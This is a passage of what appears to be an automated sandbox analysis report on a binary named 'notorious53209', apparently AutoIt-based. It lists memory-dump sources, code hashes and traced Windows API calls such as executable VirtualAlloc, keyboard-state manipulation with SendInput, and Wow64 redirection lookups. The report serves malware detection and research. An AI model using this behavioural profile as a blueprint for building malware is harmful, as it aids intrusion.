                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: msctls_trackbar32
                                            • API String ID: 3850602802-1010561917
                                            • Opcode ID: 0c6d7eed0e495c095fcb4e14af71871f945821521570d27f6e4cf6f6037b4627
                                            • Instruction ID: c7be028253d2df362c3d43c20a72f14aa63a8e900e4249bc9e74bb94a825f27e
                                            • Opcode Fuzzy Hash: 0c6d7eed0e495c095fcb4e14af71871f945821521570d27f6e4cf6f6037b4627
                                            • Instruction Fuzzy Hash: FC110672264209BBEF119F70CC05FEB77ADEFC9BA4F010529FA51A6090D271E861DB60
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 002AC312
                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00271D88,?), ref: 002AC324
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                            • API String ID: 2574300362-1816364905
                                            • Opcode ID: 5688fd4598d0a3a73aafd6fdb0fa3c0368a77156c8b470f95abe6f42c7ab6c6e
                                            • Instruction ID: 0da938c90c0c393996910fc44104ebdbcb1c937c84449f1d58a5f8e43d78fb81
                                            • Opcode Fuzzy Hash: 5688fd4598d0a3a73aafd6fdb0fa3c0368a77156c8b470f95abe6f42c7ab6c6e
                                            • Instruction Fuzzy Hash: 8CE08C70230303CFCF214F29DC08A86B6D8EB1E354B90C879E899D6220EB70D8A0CA60
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00234CA3
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00234C2E), ref: 00234CB5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 2574300362-192647395
                                            • Opcode ID: 5af698a8009352a043556a9f4070e1a18200725ca3c9e02f9e83c529ff364eef
                                            • Instruction ID: 64fe396e71cd0dae5fc0f6631f6dee68b389f72d33c07a93862a4f6ba70ad0ee
                                            • Opcode Fuzzy Hash: 5af698a8009352a043556a9f4070e1a18200725ca3c9e02f9e83c529ff364eef
                                            • Instruction Fuzzy Hash: CCD0C770530323CFCB20AF38EF1864272E8AF0A780F10CC3AD89AC2150E670E890CA20
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00234D6F
                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,002F62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00234D81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-3689287502
                                            • Opcode ID: 866407dbe0851be7bfe029b8fd681762b7cbe0013633b2c4b3aac9448d049fc2
                                            • Instruction ID: 7dfb92393f2a141ee35a00668c2965a0b566a950b08fbc8955f7b9e839db6335
                                            • Opcode Fuzzy Hash: 866407dbe0851be7bfe029b8fd681762b7cbe0013633b2c4b3aac9448d049fc2
                                            • Instruction Fuzzy Hash: A9D01770530713CFD720AF39ED0865676E8AF16792F11CD7AD89AD6250E670E890CA60
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00234DA2
                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00234DB4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-1355242751
                                            • Opcode ID: 6fd86aabe06ae60dca23a031185b4e6d9ab9603ab60dc1e04fb524f105a8ab71
                                            • Instruction ID: 1a8c4443ae4983b49e43b508bfa6109139f4acf866460fd098a3ac101ec5452b
                                            • Opcode Fuzzy Hash: 6fd86aabe06ae60dca23a031185b4e6d9ab9603ab60dc1e04fb524f105a8ab71
                                            • Instruction Fuzzy Hash: 9CD01771570713CFD720AF39ED08A8676E8AF0A395F11CC7AD8DAD6150E770E890CA60
                                            APIs
                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 002B1080
                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002B1092
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                            • API String ID: 2574300362-4033151799
                                            • Opcode ID: 90b4946831187fcefc9ca6c93eaef282ced8736d29cf074223c8ff2c7cabde69
                                            • Instruction ID: 429076b37c393694163b2237d3cf360b1228fcb1314b85a5bd345a54e0f97264
                                            • Opcode Fuzzy Hash: 90b4946831187fcefc9ca6c93eaef282ced8736d29cf074223c8ff2c7cabde69
                                            • Instruction Fuzzy Hash: 9FD08C30460313CFC3215F39D82855B72E4AF15391B408D29A999C6150D770C4A08610
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 002A9403
                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,002BF910), ref: 002A9415
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetModuleHandleExW$kernel32.dll
                                            • API String ID: 2574300362-199464113
                                            • Opcode ID: 42c3c3069cf8f23ca9ae0b70e02966d12b2d10b0c7167b0eb78514acd3305df1
                                            • Instruction ID: 0ec1bec12568769e6049e26ed6e47a698530830773cf7d94c580b07b86fa2267
                                            • Opcode Fuzzy Hash: 42c3c3069cf8f23ca9ae0b70e02966d12b2d10b0c7167b0eb78514acd3305df1
                                            • Instruction Fuzzy Hash: 01D01234570713CFD7205F36EE0C54676D5AF0A351B21CC3AD495D6550DA70D4D4CA50
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1312b6cdb4e5b8407cfd049d3b11ea947a1c59cebfeb3f3c38269d32d2e6d122
                                            • Instruction ID: aafe2a738a57102e395f36874573a66aa19da2384f329671b705675e316d2345
                                            • Opcode Fuzzy Hash: 1312b6cdb4e5b8407cfd049d3b11ea947a1c59cebfeb3f3c38269d32d2e6d122
                                            • Instruction Fuzzy Hash: F5C18F79A15216EFDB14DF94C884EAEBBF5FF48314B208598E805EB290D730ED91DB90
                                            APIs
                                            • CharLowerBuffW.USER32(?,?), ref: 002AE3D2
                                            • CharLowerBuffW.USER32(?,?), ref: 002AE415
                                              • Part of subcall function 002ADAB9: CharLowerBuffW.USER32(?,?), ref: 002ADAD9
                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002AE615
                                            • _memmove.LIBCMT ref: 002AE628
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                            • String ID:
                                            • API String ID: 3659485706-0
                                            • Opcode ID: 2c943192d5fd3f118cdd6a1d34774beca88f925e24c37aedeccf48eb365f958a
                                            • Instruction ID: 2dcf9df6a8be1f1fad47741ce2f94823b7b30f647b70a37cc08818e6ef93b692
                                            • Opcode Fuzzy Hash: 2c943192d5fd3f118cdd6a1d34774beca88f925e24c37aedeccf48eb365f958a
                                            • Instruction Fuzzy Hash: AAC18DB1A283018FCB14DF28C48095ABBE4FF89714F15896DF8999B351DB70E956CF82
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 002A83D8
                                            • CoUninitialize.OLE32 ref: 002A83E3
                                              • Part of subcall function 0028DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0028DAC5
                                            • VariantInit.OLEAUT32(?), ref: 002A83EE
                                            • VariantClear.OLEAUT32(?), ref: 002A86BF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                            • String ID:
                                            • API String ID: 780911581-0
                                            • Opcode ID: a3a57415e51f0858b3e4895545064ad38a0c18d673b5eb59d931c7602d3b4b9f
                                            • Instruction ID: 11e1b0db89b31b0cd6a9963fdd3316d92dcc0b78af4a87e29b5f2af124227e49
                                            • Opcode Fuzzy Hash: a3a57415e51f0858b3e4895545064ad38a0c18d673b5eb59d931c7602d3b4b9f
                                            • Instruction Fuzzy Hash: F9A135752247029FDB10DF14C885B2AB7E4BF8A714F144549F99A9B3A1CB70EC64CF42
                                            APIs
                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00287C32
                                            • CoTaskMemFree.OLE32(00000000), ref: 00287C4A
                                            • CLSIDFromProgID.OLE32(?,?), ref: 00287C6F
                                            • _memcmp.LIBCMT ref: 00287C90
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FromProg$FreeTask_memcmp
                                            • String ID:
                                            • API String ID: 314563124-0
                                            • Opcode ID: b458eb032e19d015444bda344fd9769384ac5141e8dd405ba58022cb3dcb25d7
                                            • Instruction ID: 4705e2116c87ecf8d749caea5f4252ed7075e23df13ad7213a138a6bfa0fcf87
                                            • Opcode Fuzzy Hash: b458eb032e19d015444bda344fd9769384ac5141e8dd405ba58022cb3dcb25d7
                                            • Instruction Fuzzy Hash: 91813C75A1110AEFCB04DF94C984EEEB7B9FF89315F204199F505AB250DB71AE05CB60
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Variant$AllocClearCopyInitString
                                            • String ID:
                                            • API String ID: 2808897238-0
                                            • Opcode ID: 79d67e53ac062eb9b6b0b01b878a1d9dd1ea386aa8c7e99cb196ca0c2eb478d1
                                            • Instruction ID: 587a1dec931ffe478466c4dd1b30e2e47950521c4fc8a7bdeb53621f657dd34f
                                            • Opcode Fuzzy Hash: 79d67e53ac062eb9b6b0b01b878a1d9dd1ea386aa8c7e99cb196ca0c2eb478d1
                                            • Instruction Fuzzy Hash: 9051E9786393069ADB20BF65D895B2AB3E4AF19310F30881FE656C76D1DB70D8609F11
                                            APIs
                                            • GetWindowRect.USER32(00BA5190,?), ref: 002B9AD2
                                            • ScreenToClient.USER32(00000002,00000002), ref: 002B9B05
                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 002B9B72
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$ClientMoveRectScreen
                                            • String ID:
                                            • API String ID: 3880355969-0
                                            • Opcode ID: ea0128ca3a98233e5bcb86ac78dd22956ee18b2f0ea4d849327ab014a464b25a
                                            • Instruction ID: d202e112e80202aa01398aa4728fbd95e072dcb312acd3c44e420fb5e1614766
                                            • Opcode Fuzzy Hash: ea0128ca3a98233e5bcb86ac78dd22956ee18b2f0ea4d849327ab014a464b25a
                                            • Instruction Fuzzy Hash: F5515234A10209EFCF10DF58E985AEE7BB5FF443A4F148669F9159B290D730AD91CB50
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002B8B4D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 2bd2e2e95904319215ef1dab8f923c112623e5039e6463882e9c2df198381ed7
                                            • Instruction ID: 4d8b86e548ba388ff45d8d7bbbf57942e55a7d623ecd030168e23f3aeb3a42c4
                                            • Opcode Fuzzy Hash: 2bd2e2e95904319215ef1dab8f923c112623e5039e6463882e9c2df198381ed7
                                            • Instruction Fuzzy Hash: 61311875230205BEEF208E38DC59FE9376CEB05398F244612FA59D62A1DE30A960CB41
                                            APIs
                                            • ClientToScreen.USER32(?,?), ref: 002BAE1A
                                            • GetWindowRect.USER32(?,?), ref: 002BAE90
                                            • PtInRect.USER32(?,?,002BC304), ref: 002BAEA0
                                            • MessageBeep.USER32(00000000), ref: 002BAF11
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Rect$BeepClientMessageScreenWindow
                                            • String ID:
                                            • API String ID: 1352109105-0
                                            • Opcode ID: 9a051922afba6e0f1e3dc9d499e4f0a435414538d1aa2503542784ab323c8ee2
                                            • Instruction ID: 6eac7ecd31d7320089ac2a9aa44c8b724efab09bc0c5a3f722147b24f88aacb6
                                            • Opcode Fuzzy Hash: 9a051922afba6e0f1e3dc9d499e4f0a435414538d1aa2503542784ab323c8ee2
                                            • Instruction Fuzzy Hash: 7441797061021ADFCB11CF58D888AE9BBF5FF48390F1881B9E8549B251D731E855CF92
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00291037
                                            • SetKeyboardState.USER32(00000080), ref: 00291053
                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002910B9
                                            • SendInput.USER32(00000001,00000000,0000001C), ref: 0029110B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
